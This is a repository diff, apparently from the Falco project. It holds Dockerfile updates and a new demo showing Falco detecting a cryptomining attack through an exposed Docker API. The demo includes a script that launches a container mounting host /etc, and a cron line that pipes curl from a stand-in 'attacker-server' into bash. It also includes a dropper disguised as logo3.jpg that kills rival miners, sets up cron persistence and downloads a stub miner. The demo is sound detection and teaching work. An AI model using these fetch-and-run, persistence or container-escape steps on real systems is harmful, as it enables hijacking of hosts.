+  && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
+  && apt-get update \
+  && apt-get install -y --no-install-recommends falco \
   && apt-get clean \
   && rm -rf /var/lib/apt/lists/*
 
@@ -45,4 +44,7 @@ RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/fa
 RUN rm -df /lib/modules \
   && ln -s $HOST_ROOT/lib/modules /lib/modules
 
+#COPY ./entrypoint.sh /
+# ENTRYPOINT ["/entrypoint.sh"]
+
 CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

docker/slim-stable/Dockerfile

@@ -0,0 +1,50 @@
+FROM ubuntu:18.04
+
+LABEL maintainer="opensource@sysdig.com"
+
+ENV FALCO_REPOSITORY stable
+
+LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+
+ENV HOST_ROOT /host
+
+ENV HOME /root
+
+RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
+
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
+
+RUN apt-get update \
+  && apt-get install -y --no-install-recommends \
+  # 	bash-completion \
+  # 	bc \
+  ca-certificates \
+  curl \
+  gnupg2 \
+  jq \
+  # 	netcat \
+  # 	xz-utils \
+  && rm -rf /var/lib/apt/lists/*
+
+RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
+  && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
+  && apt-get update \
+  && apt-get install -y --no-install-recommends falco \
+  && apt-get clean \
+  && rm -rf /var/lib/apt/lists/*
+
+# Change the falco config within the container to enable ISO 8601
+# output.
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
+  && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+
+# Some base images have an empty /lib/modules by default
+# If it's not empty, docker build will fail instead of
+# silently overwriting the existing directory
+RUN rm -df /lib/modules \
+  && ln -s $HOST_ROOT/lib/modules /lib/modules
+
+#COPY ./entrypoint.sh /
+# ENTRYPOINT ["/entrypoint.sh"]
+
+CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

docker/stable/Dockerfile

@@ -1,19 +1,19 @@
-FROM debian:stable
+FROM debian:unstable
 
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
-LABEL usage="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+ENV FALCO_REPOSITORY stable
 
-ARG FALCO_VERSION=latest
-ARG VERSION_BUCKET=deb
-ENV VERSION_BUCKET=${VERSION_BUCKET}
+LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
 
-ENV FALCO_VERSION=${FALCO_VERSION}
 ENV HOST_ROOT /host
+
 ENV HOME /root
 
 RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
 
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
+
 RUN apt-get update \
 	&& apt-get install -y --no-install-recommends \
 	bash-completion \
@@ -33,36 +33,36 @@ RUN apt-get update \
 	xz-utils \
 	&& rm -rf /var/lib/apt/lists/*
 
-# gcc 6 is no longer included in debian stable, but we need it to
+# gcc 6 is no longer included in debian unstable, but we need it to
 # build kernel modules on the default debian-based ami used by
 # kops. So grab copies we've saved from debian snapshots with the
 # prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
 # or so.
 
-RUN curl -L -o cpp-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-6_6.3.0-18_amd64.deb \
-	&& curl -L -o gcc-6-base_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6-base_6.3.0-18_amd64.deb \
-	&& curl -L -o gcc-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6_6.3.0-18_amd64.deb \
-	&& curl -L -o libasan3_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libasan3_6.3.0-18_amd64.deb \
-	&& curl -L -o libcilkrts5_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libcilkrts5_6.3.0-18_amd64.deb \
-	&& curl -L -o libgcc-6-dev_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-6-dev_6.3.0-18_amd64.deb \
-	&& curl -L -o libubsan0_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libubsan0_6.3.0-18_amd64.deb \
-	&& curl -L -o libmpfr4_3.1.3-2_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpfr4_3.1.3-2_amd64.deb \
-	&& curl -L -o libisl15_0.18-1_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-1_amd64.deb \
+RUN curl -o cpp-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/cpp-6_6.3.0-18_amd64.deb \
+	&& curl -o gcc-6-base_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6-base_6.3.0-18_amd64.deb \
+	&& curl -o gcc-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6_6.3.0-18_amd64.deb \
+	&& curl -o libasan3_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libasan3_6.3.0-18_amd64.deb \
+	&& curl -o libcilkrts5_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libcilkrts5_6.3.0-18_amd64.deb \
+	&& curl -o libgcc-6-dev_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libgcc-6-dev_6.3.0-18_amd64.deb \
+	&& curl -o libubsan0_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libubsan0_6.3.0-18_amd64.deb \
+	&& curl -o libmpfr4_3.1.3-2_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libmpfr4_3.1.3-2_amd64.deb \
+	&& curl -o libisl15_0.18-1_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libisl15_0.18-1_amd64.deb \
 	&& dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
 	&& rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
 
-# gcc 5 is no longer included in debian stable, but we need it to
+# gcc 5 is no longer included in debian unstable, but we need it to
 # build centos kernels, which are 3.x based and explicitly want a gcc
 # version 3, 4, or 5 compiler. So grab copies we've saved from debian
 # snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.
 
-RUN curl -L -o cpp-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-5_5.5.0-12_amd64.deb \
-	&& curl -L -o gcc-5-base_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
-	&& curl -L -o gcc-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5_5.5.0-12_amd64.deb \
-	&& curl -L -o libasan2_5.5.0-12_amd64.deb	https://dl.bintray.com/falcosecurity/dependencies/libasan2_5.5.0-12_amd64.deb \
-	&& curl -L -o libgcc-5-dev_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
-	&& curl -L -o libisl15_0.18-4_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-4_amd64.deb \
-	&& curl -L -o libmpx0_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpx0_5.5.0-12_amd64.deb \
+RUN curl -o cpp-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/cpp-5_5.5.0-12_amd64.deb \
+	&& curl -o gcc-5-base_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
+	&& curl -o gcc-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5_5.5.0-12_amd64.deb \
+	&& curl -o libasan2_5.5.0-12_amd64.deb	https://s3.amazonaws.com/download.draios.com/dependencies/libasan2_5.5.0-12_amd64.deb \
+	&& curl -o libgcc-5-dev_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
+	&& curl -o libisl15_0.18-4_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libisl15_0.18-4_amd64.deb \
+	&& curl -o libmpx0_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libmpx0_5.5.0-12_amd64.deb \
 	&& dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
 	&& rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
 
@@ -75,10 +75,10 @@ RUN rm -rf /usr/bin/clang \
 	&& ln -s /usr/bin/clang-7 /usr/bin/clang \
 	&& ln -s /usr/bin/llc-7 /usr/bin/llc
 
-RUN curl -s https://falco.org/repo/falcosecurity-3672BA8F.asc | apt-key add - \
-	&& echo "deb https://dl.bintray.com/falcosecurity/${VERSION_BUCKET} stable main" | tee -a /etc/apt/sources.list.d/falcosecurity.list \
-	&& apt-get update -y \
-	&& if [ "$FALCO_VERSION" = "latest" ]; then apt-get install -y --no-install-recommends falco; else apt-get install -y --no-install-recommends falco=${FALCO_VERSION}; fi \
+RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
+	&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
+	&& apt-get update \
+	&& apt-get install -y --no-install-recommends falco \
 	&& apt-get clean \
 	&& rm -rf /var/lib/apt/lists/*
 
@@ -93,13 +93,13 @@ RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/fa
 RUN rm -df /lib/modules \
 	&& ln -s $HOST_ROOT/lib/modules /lib/modules
 
-# debian:stable head contains binutils 2.31, which generates
+# debian:unstable head contains binutils 2.31, which generates
 # binaries that are incompatible with kernels < 4.16. So manually
 # forcibly install binutils 2.30-22 instead.
-RUN curl -L -o binutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils_2.30-22_amd64.deb \
-	&& curl -L -o libbinutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libbinutils_2.30-22_amd64.deb \
-	&& curl -L -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
-	&& curl -L -o binutils-common_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-common_2.30-22_amd64.deb \
+RUN curl -s -o binutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils_2.30-22_amd64.deb \
+	&& curl -s -o libbinutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libbinutils_2.30-22_amd64.deb \
+	&& curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+	&& curl -s -o binutils-common_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-common_2.30-22_amd64.deb \
 	&& dpkg -i *binutils*.deb \
 	&& rm -f *binutils*.deb
 

docker/stable/docker-entrypoint.sh

@@ -16,6 +16,7 @@
 # limitations under the License.
 #
 
+# set -e
 
 # Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
 
@@ -24,11 +25,10 @@ if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
 
     for i in "$HOST_ROOT/usr/src"/*
     do
-        base=$(basename "$i")
-        ln -s "$i" "/usr/src/$base"
+        ln -s "$i" "/usr/src/$i"
     done
 
-    /usr/bin/falco-driver-loader
+    /usr/bin/falco-probe-loader
 fi
 
 exec "$@"

docker/tester/Dockerfile

@@ -2,15 +2,15 @@ FROM fedora:31
 
 LABEL name="falcosecurity/falco-tester"
 LABEL usage="docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build -e FALCO_VERSION=<current_falco_version> --name <name> falcosecurity/falco-tester test"
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ENV FALCO_VERSION=
 ENV BUILD_TYPE=release
 
-RUN dnf install -y python-pip python docker findutils jq unzip && dnf clean all
+RUN dnf install -y python2-pip python2 docker findutils jq unzip && dnf clean all
 ENV PATH="/root/.local/bin/:${PATH}"
-RUN pip install --user avocado-framework==69.0
-RUN pip install --user avocado-framework-plugin-varianter-yaml-to-mux==69.0
+RUN pip2 install --user avocado-framework==69.0
+RUN pip2 install --user avocado-framework-plugin-varianter-yaml-to-mux==69.0
 
 COPY ./root /
 

docker/tester/root/runners/deb.Dockerfile

@@ -1,5 +1,5 @@
 FROM ubuntu:18.04
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ARG FALCO_VERSION=
 RUN test -n FALCO_VERSION

docker/tester/root/runners/rpm.Dockerfile

@@ -1,6 +1,6 @@
 FROM centos:7
 
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ARG FALCO_VERSION=
 RUN test -n FALCO_VERSION

docker/tester/root/runners/tar.gz.Dockerfile

@@ -1,21 +0,0 @@
-FROM ubuntu:18.04
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
-
-ARG FALCO_VERSION=
-RUN test -n FALCO_VERSION
-ENV FALCO_VERSION ${FALCO_VERSION}
-
-RUN apt update -y
-RUN apt install dkms libyaml-0-2 curl -y
-
-ADD falco-${FALCO_VERSION}-x86_64.tar.gz /
-RUN cp -R /falco-${FALCO_VERSION}-x86_64/* /
-
-# Change the falco config within the container to enable ISO 8601 output.
-RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
-    && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
-
-COPY rules/*.yaml /rules/
-COPY trace_files/*.scap /traces/
-
-CMD ["/usr/bin/falco"]

docker/tester/root/usr/bin/entrypoint

@@ -47,7 +47,7 @@ case "$CMD" in
 "test")
     if [ -z "$FALCO_VERSION" ]; then
         echo "Automatically figuring out Falco version."
-        FALCO_VERSION=$("$BUILD_DIR/$BUILD_TYPE/userspace/falco/falco" --version | head -n 1 | cut -d' ' -f3 | tr -d '\r')
+        FALCO_VERSION=$("$BUILD_DIR/$BUILD_TYPE/userspace/falco/falco" --version | cut -d' ' -f3 | tr -d '\r')
         echo "Falco version: $FALCO_VERSION"
     fi
     if [ -z "$FALCO_VERSION" ]; then
@@ -58,7 +58,6 @@ case "$CMD" in
     # build docker images
     build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "deb"
     build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "rpm"
-    build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "tar.gz"
 
     # check that source directory contains Falco
     if [ ! -d "$SOURCE_DIR/falco/test" ]; then
@@ -74,7 +73,6 @@ case "$CMD" in
     # clean docker images
     clean_image "deb"
     clean_image "rpm"
-    clean_image "tar.gz"
     ;;
 "bash")
     CMD=/bin/bash

docker/tester/root/usr/bin/usage

@@ -1,7 +1,7 @@
 #!/usr/bin/env bash
 
-pythonversion=$(python -c 'import sys; version=sys.version_info[:3]; print("{0}.{1}.{2}".format(*version))')
-pipversion=$(pip --version | cut -d' ' -f 1,2,5,6)
+pythonversion=$(python2 -c 'import sys; version=sys.version_info[:3]; print("{0}.{1}.{2}".format(*version))')
+pipversion=$(pip2 --version | cut -d' ' -f 1,2,5,6)
 dockerversion=$(docker --version)
 avocadoversion=$(pip2 show avocado-framework | grep Version)
 avocadoversion=${avocadoversion#"Version: "}

examples/OWNERS

@@ -0,0 +1,2 @@
+labels:
+  - area/examples

examples/bad-mount-cryptomining/README.md

@@ -0,0 +1,117 @@
+# Demo of Falco Detecting Cryptomining Exploit
+
+## Introduction
+
+Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Falco.
+
+Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
+
+## Requirements
+
+In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
+
+## Example architecture
+
+The example consists of the following:
+
+* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
+* `attacker-server`: A nginx instance that serves the malicious files and scripts using by the attacker.
+* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
+
+All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
+
+A separate container is created to launch the attack:
+
+* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
+
+## Example Walkthrough
+
+### Start everything using docker-compose
+
+To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
+
+Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
+
+You will see fairly verbose output from dockerd:
+
+```
+host-machine_1     | crond: crond (busybox 1.27.2) started, log level 6
+host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
+host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
+host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
+```
+
+When you see log output like the following, you know that falco is started and ready:
+
+```
+falco_1            | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
+falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
+falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
+```
+
+### Launch malicious container
+
+To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.
+
+The script `launch_malicious_container.sh` performs the necessary POSTs:
+
+* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
+* `http://localhost:2375/containers/create?&name=docker123321-mysql`
+* `http://localhost:2375/containers/docker123321-mysql/start`
+
+Run the script via `bash launch_malicious_container.sh`.
+
+### Examine cron output as malicious software is installed & run
+
+`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
+
+```
+* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
+```
+
+It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron/update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg))  from `attacker-server` and run it.
+
+You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
+
+```
+CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS              PORTS               NAMES
+68ed578bd034        alpine:latest       "/bin/sh -c 'echo '*…"   About a minute ago   Up About a minute                       docker123321-mysql
+```
+
+Once the cron job runs, you will see output like the following:
+
+```
+host-machine_1     | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
+host-machine_1     | ***Checking for existing Miner program
+attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
+host-machine_1     | ***Killing competing Miner programs
+host-machine_1     | ***Reinstalling cron job to run Miner program
+host-machine_1     | ***Configuring Miner program
+attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
+attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
+host-machine_1     | ***Configuring system for Miner program
+host-machine_1     | vm.nr_hugepages = 9
+host-machine_1     | ***Running Miner program
+host-machine_1     | ***Ensuring Miner program is alive
+host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
+host-machine_1     | /var/tmp
+host-machine_1     | runing.....
+host-machine_1     | ***Ensuring Miner program is alive
+host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
+host-machine_1     | /var/tmp
+host-machine_1     | runing.....
+```
+
+### Observe Falco detecting malicious activity
+
+To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
+
+```
+falco_1            | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
+falco_1            | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
+```
+
+### Cleanup
+
+To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.
+

examples/bad-mount-cryptomining/attacker-nginx.conf

@@ -0,0 +1,14 @@
+server {
+    listen       8220;
+    server_name  localhost;
+
+    location / {
+        root   /usr/share/nginx/html;
+        index  index.html index.htm;
+    }
+
+    error_page   500 502 503 504  /50x.html;
+    location = /50x.html {
+        root   /usr/share/nginx/html;
+    }
+}

examples/bad-mount-cryptomining/attacker_files/config_1.json

@@ -0,0 +1 @@
+{"config": "some-bitcoin-miner-config-goes-here"}

examples/bad-mount-cryptomining/attacker_files/logo3.jpg

@@ -0,0 +1,64 @@
+#!/bin/sh
+echo "***Checking for existing Miner program"
+ps -fe|grep jaav |grep -v grep
+if [ $? -eq 0 ]
+then
+pwd
+else
+
+echo "***Killing competing Miner programs"
+rm -rf /var/tmp/ysjswirmrm.conf
+rm -rf /var/tmp/sshd
+ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9
+
+echo "***Reinstalling cron job to run Miner program"
+crontab -r || true && \
+echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
+crontab /tmp/cron || true && \
+rm -rf /tmp/cron || true
+
+echo "***Configuring Miner program"
+curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
+curl -so /var/tmp/jaav http://attacker-server:8220/minerd
+chmod 777 /var/tmp/jaav
+cd /var/tmp
+
+echo "***Configuring system for Miner program"
+cd /var/tmp
+proc=`grep -c ^processor /proc/cpuinfo`
+cores=$(($proc+1))
+num=$(($cores*3))
+/sbin/sysctl -w vm.nr_hugepages=$num
+
+echo "***Running Miner program"
+nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
+fi
+
+echo "***Ensuring Miner program is alive"
+ps -fe|grep jaav |grep -v grep
+if [ $? -eq 0 ]
+then
+pwd
+else
+
+echo "***Reconfiguring Miner program"
+curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
+curl -so /var/tmp/jaav http://attacker-server:8220/minerd
+chmod 777 /var/tmp/jaav
+cd /var/tmp
+
+echo "***Reconfiguring system for Miner program"
+proc=`grep -c ^processor /proc/cpuinfo`
+cores=$(($proc+1))
+num=$(($cores*3))
+/sbin/sysctl -w vm.nr_hugepages=$num
+
+echo "***Restarting Miner program"
+nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
+fi
+echo "runing....."

examples/bad-mount-cryptomining/attacker_files/minerd

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+while true; do
+      echo "Mining bitcoins..."
+      sleep 60
+done
+

examples/bad-mount-cryptomining/demo.yml

@@ -0,0 +1,41 @@
+version: '3'
+
+volumes:
+  host-filesystem:
+  docker-socket:
+
+services:
+  host-machine:
+    privileged: true
+    build:
+      context: ${PWD}/host-machine
+      dockerfile: ${PWD}/host-machine/Dockerfile
+    volumes:
+      - host-filesystem:/etc
+      - docker-socket:/var/run
+    ports:
+      - "2375:2375"
+    depends_on:
+      - "falco"
+
+  attacker-server:
+    image: nginx:latest
+    ports:
+      - "8220:8220"
+    volumes:
+      - ${PWD}/attacker_files:/usr/share/nginx/html
+      - ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf
+    depends_on:
+      - "falco"
+
+  falco:
+    image: falcosecurity/falco:latest
+    privileged: true
+    volumes:
+      - docker-socket:/host/var/run
+      - /dev:/host/dev
+      - /proc:/host/proc:ro
+      - /boot:/host/boot:ro
+      - /lib/modules:/host/lib/modules:ro
+      - /usr:/host/usr:ro
+    tty: true

examples/bad-mount-cryptomining/docker123321-mysql-container.json

@@ -0,0 +1,7 @@
+{
+    "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
+    "Image": "alpine:latest",
+    "HostConfig": {
+	"Binds": ["/etc:/mnt/etc"]
+    }
+}

examples/bad-mount-cryptomining/host-machine/Dockerfile

@@ -0,0 +1,12 @@
+FROM docker:stable-dind
+
+RUN set -ex \
+    && apk add --no-cache \
+    bash curl
+
+COPY start-cron-and-dind.sh /usr/local/bin
+
+ENTRYPOINT ["start-cron-and-dind.sh"]
+CMD []
+
+

examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh

@@ -0,0 +1,11 @@
+#!/bin/sh
+
+# Start docker-in-docker, but backgrounded with its output still going
+# to stdout/stderr.
+dockerd-entrypoint.sh &
+
+# Start cron in the foreground with a moderate level of debugging to
+# see job output.
+crond -f -d 6
+
+

examples/bad-mount-cryptomining/launch_malicious_container.sh

@@ -0,0 +1,14 @@
+#!/bin/sh
+
+echo "Pulling alpine:latest image to docker-in-docker instance"
+curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
+
+echo "Creating container mounting /etc from host-machine"
+curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
+
+echo "Running container mounting /etc from host-machine"
+curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'
+
+
+
+

examples/k8s_audit_config/README.md

@@ -0,0 +1,136 @@
